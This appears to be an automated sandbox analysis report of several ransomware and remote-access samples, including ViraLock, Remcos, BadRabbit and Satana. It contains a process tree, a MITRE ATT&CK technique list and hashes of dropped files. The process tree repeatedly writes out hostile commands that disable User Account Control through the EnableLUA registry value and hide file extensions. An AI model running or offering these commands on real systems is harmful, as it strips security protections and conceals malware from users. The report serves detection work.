        UAC bypass
        
        PID:6124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zWYgEIwU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        15⤵
        
        PID:5760
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        16⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        13⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        13⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        13⤵
        UAC bypass
        Modifies registry key
        
        PID:2760
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yuUkoUgA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        13⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        14⤵
        
        PID:5488
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        11⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        11⤵
        
        PID:2704
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        11⤵
        UAC bypass
        Modifies registry key
        
        PID:5148
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wyIkcMgk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        11⤵
        
        PID:3244
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:716
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        9⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:6136
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        9⤵
        Modifies registry key
        
        PID:2572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:5768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        9⤵
        UAC bypass
        Modifies registry key
        
        PID:5128
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JCMkIsws.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        9⤵
        
        PID:5244
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:5776
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        10⤵
        
        PID:672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        7⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5260
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        7⤵
        
        PID:3260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        7⤵
        UAC bypass
        
        PID:440
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EqIQgkcM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        7⤵
        
        PID:5368
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4372
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        8⤵
        
        PID:692
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:5768
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        Modifies registry key
        
        PID:5776
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        UAC bypass
        
        PID:5788
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kEcoMQwg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        5⤵
        
        PID:5804
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        
        PID:5372
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:4904
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    - Modifies registry key
    PID:4556
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ziYockoo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
    3⤵
    PID:4024
  - - C:\Windows\SysWOW64\cscript.exe
      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:5472

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4432

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2640

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1172

C:\Users\Admin\Downloads\Remcos.exe
"C:\Users\Admin\Downloads\Remcos.exe"
1⤵
- Executes dropped EXE
PID:3204

C:\Users\Admin\Downloads\Remcos.exe
"C:\Users\Admin\Downloads\Remcos.exe"
1⤵
- Executes dropped EXE
PID:3020

C:\Users\Admin\Downloads\Remcos.exe
"C:\Users\Admin\Downloads\Remcos.exe"
1⤵
- Executes dropped EXE
PID:4808

C:\Users\Admin\Downloads\Remcos.exe
"C:\Users\Admin\Downloads\Remcos.exe"
1⤵
- Executes dropped EXE
PID:1636

C:\Users\Admin\Downloads\BadRabbit.exe
"C:\Users\Admin\Downloads\BadRabbit.exe"
1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4428
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1288

C:\Users\Admin\Downloads\BadRabbit.exe
"C:\Users\Admin\Downloads\BadRabbit.exe"
1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3856
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3260

C:\Users\Admin\Downloads\BadRabbit.exe
"C:\Users\Admin\Downloads\BadRabbit.exe"
1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4632
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3876

C:\Users\Admin\Downloads\Remcos.exe
"C:\Users\Admin\Downloads\Remcos.exe"
1⤵
- Executes dropped EXE
PID:4112

C:\Users\Admin\Downloads\BadRabbit.exe
"C:\Users\Admin\Downloads\BadRabbit.exe"
1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2864
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 224 -ip 224
1⤵
PID:2928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3156 -ip 3156
1⤵
PID:324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4256 -ip 4256
1⤵
PID:180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 8 -ip 8
1⤵
PID:4768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4012 -ip 4012
1⤵
PID:3788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2860 -ip 2860
1⤵
PID:4024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4000 -ip 4000
1⤵
PID:3500

C:\Users\Admin\Downloads\Satana.exe
"C:\Users\Admin\Downloads\Satana.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4568
- C:\Users\Admin\Downloads\Satana.exe
  "C:\Users\Admin\Downloads\Satana.exe"
  2⤵
  - Executes dropped EXE
  PID:3420
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 360
    3⤵
    - Program crash
    PID:1240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3420 -ip 3420
1⤵
PID:2356

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\!Please Read Me!.txt
1⤵
PID:4108

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4272

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\!Please Read Me!.txt
1⤵
PID:4556

C:\Users\Admin\Downloads\ViraLock.exe
"C:\Users\Admin\Downloads\ViraLock.exe"
1⤵
PID:916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
  2⤵
  PID:4868
- - C:\Users\Admin\Downloads\ViraLock.exe
    C:\Users\Admin\Downloads\ViraLock
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5860
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
      4⤵
      PID:5096
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2396
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies visibility of file extensions in Explorer
      Modifies registry key
      PID:5368
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      System Location Discovery: System Language Discovery
      PID:5136
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5944
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      UAC bypass
      Modifies registry key
      PID:5956
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PicoMYsw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
      4⤵
      PID:2928
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5924
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  - Modifies registry key
  PID:1224
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5788
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  - Modifies registry key
  PID:2692
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4696
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  - System Location Discovery: System Language Discovery
  - Modifies registry key
  PID:5520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VsUUEQUA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
  2⤵
  PID:5744
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:5544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe

Filesize
645KB

MD5
c099913dac709282a75d71bc7909aad5

SHA1
e13ab38605e525d57581772fcda0d48824d41454

SHA256
5f7fbaeead974b11c74a4bb6db6ef5e988786e25bb6d22c25b78a0e19dacebd9

SHA512
6e3b82ceb5025e25c367fd90735aaf897c2cdbbff216cf4eda00e2bd2196e6bcb26b1dd25c958c243a49cb02a3bec6c6aa1bfdb31c3f2aac88bb62e2e65db5d1

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.exe

Filesize
309KB

MD5
38cb0998d3f6f45d51477d259e307e66

SHA1
36f1c6ac4a9f5369a4d47c94ba4c4b17cf4a345a

SHA256
a26513fbedf2003fd6348c8a9f4e7ed736637ddb6cd6016ef42d1a789287fd70

SHA512
d50ad6efea809978c0d6d6e6a06d11dc550bdddb0ce5d762dd3fa023af845850f4112a566eaf848bf6811dfb304d21afde048a9465521eec97aa9c6fd12d7e94

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.exe

Filesize
319KB

MD5
cc58af2c9000f838e90bbaf97f3c3c26

SHA1
2eb0a977d6e380db1070566ece62e25fbc9f093b

SHA256
aa37f0e14b0a6326312f9c84977d9162e88e67c1ff6784fb55b5813ad862c4d6

SHA512
051957e463c4c5527079c2f9b8ff346be40aceb2e2388766e02faeb8df6c48a95e294af8cca35ae8053cdd2e7452ca568d0460af5d8dd510b5d8cfdedb1b60bb

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.exe

Filesize
237KB

MD5
9205ca518cbfc67ce513d37b462e1a74

SHA1
f34cb01259a25b258023beba8a15cee043d62213

SHA256
78fbb443abfc2ee75650156d327ed7b26d8ff1677e523684767e0ac854d7ced0

SHA512
668621546d40fdb6cd84bc7c180e88cc8f63f915e16c6c947fc10cef2a1d671d99024e0bd6d51b2ca8bd43d1600b1800cf6a306cedb1899c9880aa44000893c2

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.exe

Filesize
229KB

MD5
969a3b232accb3d121b7d74798dfb9d1

SHA1
393a4e85fb4cccd5195731115e6bfe8668997028

SHA256
57f357946b58c6f794ab3a421b702e0f3efed5daa64192fbeed83564dee176ba

SHA512
a6a547603f1a3c35605d4edfed7a3c0198a601f72a35639d3f017dc7c4c6cd0c2d2acf9c002f3cd19047134dae99f7222b02647be4a8d8aae73bb998b817f6f3

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.exe

Filesize
231KB

MD5
3a103191e14d33eae78085b1688945a4

SHA1
7696a774135caf9ff7a91cfb9b28c81ecbf25e1d

SHA256
8cd4263d0bc2547f6c04fe24d4e580c6f6f1685ad7bed0dae2d0210fdda50aa3

SHA512
d370ba117c2fd24e25d2922c0a379887cbb5751872f5d2a59e307e7952495eaa15894c11b6b7079b535a5a30743bb8d4686c57056f614d4582ae3293789e362e

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.exe

Filesize
312KB

MD5
9523d281e639cc8fef817011e39956d0

SHA1
6c495fa286e9e5a93d6c61748fe5ec444a5c84a9

SHA256
17b2adc11c15147c4905a447cef9af23375ab2a77e84899ac41f01c1569882d3

SHA512
967bfb07c6c6f54a6abea51471edbed43f68ccb9ed4af13aee440aafd5ba0ed82d82ed8dcee4a6355e2a475ed36da9d0509636cf20887b8c3586a609eaac072b

Download Submit
C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe

Filesize
627KB

MD5
4915776c148a5a327d69580b7246e318

SHA1
423887c3216c1d530ff64bc4ecef324e2f3d8733

SHA256
9598feccaa0cd6c8e4d50038c5431e94f0b753f63bd20e322d19b32c3e0d40cd

SHA512
bdf4dd457858674ba0be46e975635b52ac2b107253ba067266a68c2d1e5f682e884971f1c7e17a275586ac49c1659a168cab80790efd39f05458dac9d026ca8e

Download Submit
C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe

Filesize
817KB

MD5
47aaacbcdb3382074dc018440bb23076

SHA1
f975c5b8fc39fb1eda0d385d495b64d3f47ac130

SHA256
7db0a5d3ac47e33f9188c082cadc6f33162db4cba64e384140c303d0d5f6e89c

SHA512
4cf9592b7480c693dfb5db65643042b4b5d1e66e6e02d80c2a25e4326a361c10fa73479f9fb325fa8ac93543231820b5637d2d785f6bf9bcc211bfc73b8c9570

Download Submit
C:\ProgramData\Package Cache\{63880b41-04fc-4f9b-92c4-4455c255eb8c}\windowsdesktop-runtime-8.0.2-win-x64.exe

Filesize
804KB

MD5
7c6826555fef6f9cce02e87470b191ee

SHA1
f214e328ef2681d492d8f7fda0752d3f019e6c34

SHA256
14552b34c594d328b9357293b6e198ac5d84501a89783d0bfe4286dae2a23bfd

SHA512
d9b07685552524b8eedf1bb3b0e108735ca15d3f626aa1e9509f3b471a01b27cece107b09edb1a7ec422f11314d75deccb4fe20b8c3ffae9f48ab481b03216cd

Download Submit
C:\Recovery\WindowsRE\!WannaDecryptor!.exe.lnk

Filesize
590B

MD5
f0ce3bf75d8caec71d7c4b9f41fe511b

SHA1
6e4776acf2c3a3ab7608860e4d7da86514be43f6

SHA256
ff12701d482f6f17f14f787f6e647e23234f6bac1455648a6928ccddfb758f09

SHA512
a8b97ab53b850e53bda62820124c83cd72c6047e82e6e5a6d2b43cec55f6c1904ee479c2c6152ec629e33251013168461abdc993ed214c33c78354807439eadd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\59D76868C250B3240414CE3EFBB12518_20EE82064EA4952B4E13904F8FA7AA50

Filesize
471B

MD5
281ec7405c707ef000d611c6f65abbdf

SHA1
e8b3e6d16065dd6e1b1c64ee8281888474777f0d

SHA256
0385c5c4024d3d32f3a7a23d9ced8ea8f625a213fa7bca260dc093fc9c3e3851

SHA512
dadffae8e0b6c40ea2d2fb897b1cac63e58f6d629fe69788b9fa5971d8d91ae97bea1455eeacb4127be5db31ceddf024bc5608cd632b95869219d0784ca7c438

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\59D76868C250B3240414CE3EFBB12518_20EE82064EA4952B4E13904F8FA7AA50

Filesize
400B

MD5
53e3768f53651e15ee3fb3197a1b9406

SHA1
234ce8e79c99fea213c3846f39bec08895d277eb

SHA256
c7928cd5d39cab4545113fefefae9e3b0ac8195401aec9b8be3f5c2822ef5458

SHA512
53026b8133b684407b87231ba771a8fac184847feb9b21cef42eb4acbd6f53d78dcdb8ada60d577d2e9cc5288323eb8eeb0d2af80f4bcae9cfdb8eb7dba959e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f9664c896e19205022c094d725f820b6

SHA1
f8f1baf648df755ba64b412d512446baf88c0184

SHA256
7121d84202a850791c2320385eb59eda4d697310dc51b1fcd4d51264aba2434e

SHA512
3fa5d2c68a9e70e4a25eaac2095171d87c741eec2624c314c6a56f4fa390d6319633bf4c48b1a4af7e9a0451f346beced9693da88cfc7bcba8dfe209cbd1b3ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
847d47008dbea51cb1732d54861ba9c9

SHA1
f2099242027dccb88d6f05760b57f7c89d926c0d

SHA256
10292fa05d896a2952c1d602a72d761d34bc776b44d6a7df87e49b5b613a8ac1

SHA512
bd1526aa1cc1c016d95dfcc53a78b45b09dde4ce67357fc275ab835dbe1bb5b053ca386239f50cde95ad243a9c1bbb12f7505818577589beecc6084f7b94e83f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
1761985a877731fe25b1fde06d1021d8

SHA1
10cc14ac9fabc1d4737e2916c55b7b2f89301aed

SHA256
0892a4a84bcfc36f0f62004d3d0b598bc3ad4a64111a145c971630f7dc207779

SHA512
e5e351bd7f63f6525346f6130e7f886a308aca855602066ac99b5205e40136538bf48c755ebf7d95e9cc853f85e2209059a3ce0eb22de54d0ddbd550c12a75b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
b9495212949e23bf94dfff54cd9cba41

SHA1
83ac35762eb1810067427132ee4bce62d3be9545

SHA256
7c865d9d92e5235c5d4ee862a5cfad8dae7c14856eaadaeaa00a974cb9d2cc06

SHA512
9e1080547d42f1312a4c93aa5249bfd19d60505730e3ad2841c839f28a17caaff7b05cb5da32935f7f58e952b3943274f2486dfb3366fddf60abb00dba232588

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
579B

MD5
be85a012866f82533b134a3e7c03581c

SHA1
8f361377763dc0f643a3c2746149ca5850c5d8c0

SHA256
7c0534066657219aeecf9763515dbb8eeb5b0cc4509d25ed75d5347476f443a0

SHA512
38aa3dc3c36a5319162d52fb0bdb7588dfa9fada5247c49ee53d870b7d928ea5be1387e176e8caf3dd6cad9b6975d432eae587c0103f8dffc56f17ef887ae621

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
19926ff3411214eea9444755afff2bb7

SHA1
989c2f0553dd5d9b7f567f5badc19fb1802b6023

SHA256
33db03600eeb5041f61454f14440dde01ca62b7b026eff46271ac1d7c0490ebf

SHA512
947cc2ab88baf62fb5ef53faf71402a8bf80cb77b9ae2bf480f08d41e48be56d090b17ec8510c937f230163ed761ff76d7703ef60a9b8f4c1c650c5704f0de4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6868a186eaca00d67263fe5be1d90b04

SHA1
f6a4d54ad3d17aedf0156d7967c5ad625501b1b8

SHA256
3ee99329caf3d6fe8485fd7cb93f81118fafdc346c4273ee4adbb44ad5aeb50c

SHA512
7c7213bdd33c7af6d81a6d10ed74734acfe606e5069eda49646e2ca7062b76f177d612132af4554df18ab4cb0f7ec7fc1c204754b1dca7e0f3fffdad5ca47bac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
325960a9f74e561fbf48b7a4554ad2a5

SHA1
441bd551d4c3e4e69b134df34abafd6c43911ab1

SHA256
b8c2ae3f5dd6831fdb948b64c2a7df904d2f59ee026afc9d5747873c02803eb1

SHA512
8e1e769af92b342f4f92d54a1254ab356491a553fa3a682038919c3ac08cfa99023bdc6d43ad394ffdecfb6eaa60ccfe065055de52dd8cac1e72b88f7db98051

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
b3a827ba0db704ec25a5a308c84ca8c6

SHA1
02a620e559e29bf9e0148bfa84762752baa4e299

SHA256
ad8e9a3b296a9b878ac3c2725260ef9d95bb28386c45a7272ac676d7e1815a24

SHA512
439c874acea0bfcc37a17e80a3c967afce778339a2ca63691802b116f69a6dff4f2d135a67fc43a92f3a413d31b9ff26186c89713feaf27b25edb8b876c7cf08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
e4101930b73a3212058b6220a0f0e7f3

SHA1
97b9768023a0a7c061d97014d6fde2c5939cf89c

SHA256
0e950133ecfee66f043fd7cd2b34218b3a3f29915c95c75275c54486f074c01d

SHA512
bbe0c8d3b7284d644c1939edd8302a5fb355552492cba44b8bee70b819ae770eb1f0274b8d9c80541fc4e01388ce8718dca3c47b2c3080f2cd599c9672c0df82

Download Submit
